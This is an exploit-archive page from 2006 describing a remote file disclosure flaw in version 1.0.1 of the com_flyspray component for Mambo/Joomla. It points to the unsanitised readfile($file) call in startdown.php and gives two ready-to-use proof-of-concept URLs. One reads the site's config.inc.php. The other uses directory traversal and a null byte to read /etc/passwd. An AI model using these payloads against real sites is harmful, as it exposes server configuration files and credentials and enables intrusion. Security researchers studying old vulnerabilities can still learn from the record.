[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : com_flyspray Mambo Com. <= 1.0.1 Remote File Disclosure Vulnerability
# Published : 2006-11-26
# Author : 3l3ctric-Cracker
# Previous Title : Hacks List phpBB Mod <= 1.21 Remote SQL Injection Vulnerability
# Next Title : SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability
_____ __ __ __ ___
| __ | / | / (_)
| | | |_ __ | / | __ ___ __ / / _ _ __ _ _ ___
| | | | '__| | |/| |/ _` / / / / | | '__| | | / __|
| |__| | | | | | | (_| |> < / | | | | |_| __
|_____/|_| |_| |_|__,_/_/_ / |_|_| __,_|___/
*****************************************************************************************************************************
Compononent name:com_flyspray
Affected Version:1.0.1
d.page:http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip
*****************************************************************************************************************************
Authour: Dr Max Virus
Location:Egypt
*****************************************************************************************************************************
Bug in :startdown.php
Vul Code:
In Line 52:
readfile($file);
Problem:The variable of file not sanitized So u can read any file on server
and also config file
*****************************************************************************************************************************
POC:
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config.inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
*****************************************************************************************************************************
Thx To:str0ke & Nukedx & Thehacker & All My Friends
Special Gr33Ts:ASIANEAGLE & The Master &Kacper
****************************************************************************************************************************
# www.Syue.com [2006-11-26]